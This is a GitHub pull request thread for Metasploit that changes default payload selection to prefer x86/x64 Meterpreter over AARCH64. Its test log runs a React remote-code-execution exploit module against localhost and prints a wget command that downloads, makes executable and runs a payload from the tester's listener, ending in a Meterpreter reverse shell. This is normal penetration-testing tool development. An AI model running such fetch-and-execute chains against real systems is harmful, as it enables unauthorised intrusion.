@zeroSteiner
Contributor

This makes a change to the preferred list of payloads inspired by the exploit added in #20747. In that PR it was noticed that the payload was defaulting to AARCH64 when it wasn't specified and that's not as common of an architecture as x86 / x64. The changes in this PR will prioritize the 32-bit Windows meterpreter when it's compatible. 64-bit versions of Windows always support 32-bit code execution AFAIK. The same isn't true for Linux though, so in cases where the 32-bit version of the Windows Meterpreter isn't compatible, we'll default to an x64 meterpreter for any platform.

Testing

  • Use a couple of exploits and see that the automatically selected payload is reasonable. For advanced testing, you could make a mock module and toggle the different platform and architecture options to see how they affect the automatic selection.

@adfoster-r7
Contributor

React module before 🔴

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp

React Module after 🟢

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp

msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run rhost=127.0.0.1 rport=3001 httptrace=true lhost=192.168.124.1
[*] Command to run on remote host: wget -qO ./KLsOuZLJSzdf http://192.168.124.1:8080/BdoZk6lXmglO_p1Z1iaq8Q;chmod +x ./KLsOuZLJSzdf;./KLsOuZLJSzdf&
[*] Fetch handler listening on 192.168.124.1:8080
[*] HTTP server started
[*] Adding resource /BdoZk6lXmglO_p1Z1iaq8Q
[*] Started reverse TCP handler on 192.168.124.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable

meterpreter > 

@adfoster-r7 adfoster-r7 merged commit 3b8c3d3 into rapid7:master Dec 17, 2025
75 of 94 checks passed
@adfoster-r7
Contributor

Release Notes

Updates Metasploit's default payload selection logic to prefer x86 payloads over AARCH64 payloads

@adfoster-r7 adfoster-r7 added the rn-enhancement release notes enhancement label Dec 17, 2025